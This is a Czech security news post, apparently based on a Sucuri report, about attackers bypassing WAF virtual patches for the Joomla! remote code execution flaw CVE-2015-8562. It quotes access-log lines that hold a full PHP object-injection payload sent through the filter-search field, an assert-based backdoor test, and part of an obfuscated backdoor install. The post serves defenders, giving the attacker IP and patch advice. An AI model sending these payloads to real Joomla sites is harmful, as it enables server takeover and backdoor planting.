18 July 2016

Virtuální záplatování se ukázalo být neučínné po starém Oday zásahu webových stránek Joomla!

Virtuální záplatování se ukázalo být neučínné po starém Oday zásahu webových stránek Joomla!

Téměř každé řešení WAF (Web Application Firewall) lze obejít pomocí ošemetných a sofistikovaných technik nebo jinými útočnými vektory. Blog, který publikoval Sucuri to dokonale demonstruje.

Krátký příběh: Loni jsme uvědomili o závažné zranitelnosti v Joomla! (CVE-2015-8562), která vedla ke vzdálenému spuštění PHP kódu. Exploit pro tuto zranitelnost se velmi rychle dostal na veřejnost na základě kompromitování mnoha webových stránek. Vendor vydal záplatu a mnoho majitelů webových stránek si ji nainstalovali. Někteří z nich však příliš důvěřovali technologii WAF a virtuálnímu záplatování, namísto instalace aktuální záplaty. Virtuální záplata pro tuto konkrétní zranitelnost byla rychle implementována správci WAF a všichni žili šťastně až do smrti, dokud...nebyl zaveden nový vektor útoku.

Nový přístup používal neznámý vektor pomocí „filtru vyhledávání“ volby v rámci HTTP POST požadavku namísto HTTP User-Agent hlavičky. To umožnilo obejít implementovaná WAF pravidla a úspěšně kompromitovat webové stránky bez aktualizace. Nový exploit vypadá v log souborech takto:

46.183.219.91 - - [19/Jun/2016:03:16:21 -0400]

"POST /?option=com_tags HTTP/1.1" 403 4229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 

"POSTLOG:filter-search=bigus%7D__hxsjcurrrt%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A71%3A%22eval%28base64_decode%28%24_SERVER%5B%27HTTP_QGYSD%27%5D%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%3B%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7D\xF0\xFD\xFD\xFD" 

Podle šetření Sucuri hackeři zavedli “backdoor” v červnu, ale nevyužili jej až do července. Níže je uvedený příklad testu, provedený škodlivými činiteli k testování úspěšné backdoorové instalace:

46.183.219.91 - - [01/Jul/2016:04:41:20 -0400]

"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 

"POSTLOG:&php_func=assert&php=print%28%22MY_S%22.%22UCCESS%22%29%3B" 

Backdoorová instalace:

46.183.219.91 - - [01/Jul/2016:09:35:27 -0400] 

"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 

"POSTLOG:&php_func=assert&php=assert%28base64_decode%28str_rot13%28%27MKMuoPuvLKAyAwEsMTIwo2EyXUA0py9lo3DkZltaHHEwnaO6rJukHR52EwWWAHDlqKyZZzqHpUb5nUSDIwqEETWOHUMSHxIVI0ySoGOgDzbjJRAgAQuQZ09vpR4jJSSRLauhFwIxFmWOnH1HFUEQEx5uD1IOq3O6rJckHR9zGRb1LKSXH2SAEmO2EacGZxkWDKqjraydpIOJqUSIrJcAEmO2pIEWAUSDBIuZF011FQWOoT5YGmOJqx9gpUcnBIM6qGOkIH42JJj5oR1XH2MjZ0I1pIE5oKSHrKqjoQIdpUb4nJ5uJzyZFwI1o1I5ZT5XDJ1M….”

Doporučujeme majitelům webových stránek Joomla! Zkontrolovat jejich protokoly pro přítomnost IP adresy 46.183.219.91 vztahující se k tomuto incidentu.

Doporučujeme instalování poslední verze Joomla 3.4.6 nebo vyšší, která řeší tuto zranitelnost.


Přečíst všechny články

Poslední posty

Kybernetická špionážní kampaň Buhtrap využila nedávno opravený zero-day ve Windows

Kybernetická špionážní kampaň Buhtrap využila nedávno opravený zero-day ve Windows

Využití pro CVE-2019-1132 vytvořeno skupinou Buhtrap zavisí na objektech vyskakovacích oken.
12 July 2019
Magecart zasáhla přes 960 obchodů s elektronikou

Magecart zasáhla přes 960 obchodů s elektronikou

8 July 2019
Globální mobilní telekomunikace se staly oběťmi čínské kybernetické špionáže

Globální mobilní telekomunikace se staly oběťmi čínské kybernetické špionáže

Čínská skupina APT10 monitorovala záznamy uživatelských hovorů kompromitované mobilní sítí.


26 June 2019